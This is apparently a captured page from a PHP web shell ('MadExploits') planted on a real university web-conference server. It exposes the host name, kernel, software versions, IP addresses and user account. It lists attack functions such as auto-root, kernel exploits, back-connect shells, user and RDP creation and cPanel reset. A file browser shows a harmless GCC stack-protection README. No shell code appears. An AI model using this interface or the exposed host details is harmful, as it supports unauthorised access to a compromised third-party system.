Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.219.229.101
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
gcc-9-base /
[ HOME SHELL ]
Name
Size
Permission
Action
C++
[ DIR ]
drwxr-xr-x
gcc
[ DIR ]
drwxr-xr-x
gomp
[ DIR ]
drwxr-xr-x
itm
[ DIR ]
drwxr-xr-x
quadmath
[ DIR ]
drwxr-xr-x
sanitizer
[ DIR ]
drwxr-xr-x
NEWS.gz
14.82
KB
-rw-r--r--
NEWS.html
63.97
KB
-rw-r--r--
README.Bugs
10.89
KB
-rw-r--r--
README.Debian.amd64.gz
3.62
KB
-rw-r--r--
README.ssp
1.14
KB
-rw-r--r--
TODO.Debian
1.61
KB
-rw-r--r--
changelog.Debian.gz
1.08
KB
-rw-r--r--
changelog.gz
157.28
KB
-rw-r--r--
copyright
73.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.ssp
Stack smashing protection is a feature of GCC that enables a program to detect buffer overflows and immediately terminate execution, rather than continuing execution with corrupt internal data structures. It uses "canaries" and local variable reordering to reduce the likelihood of stack corruption through buffer overflows. Options that affect stack smashing protection: -fstack-protector Enables protection for functions that are vulnerable to stack smashing, such as those that call alloca() or use pointers. -fstack-protector-all Enables protection for all functions. -Wstack-protector Warns about functions that will not be protected. Only active when -fstack-protector has been used. Applications built with stack smashing protection should link with the ssp library by using the option "-lssp" for systems with glibc-2.3.x or older; glibc-2.4 and newer versions provide this functionality in libc. The Debian architectures alpha, hppa, ia64, m68k, mips, mipsel do not have support for stack smashing protection. More documentation can be found at the project's website: http://researchweb.watson.ibm.com/trl/projects/security/ssp/
Close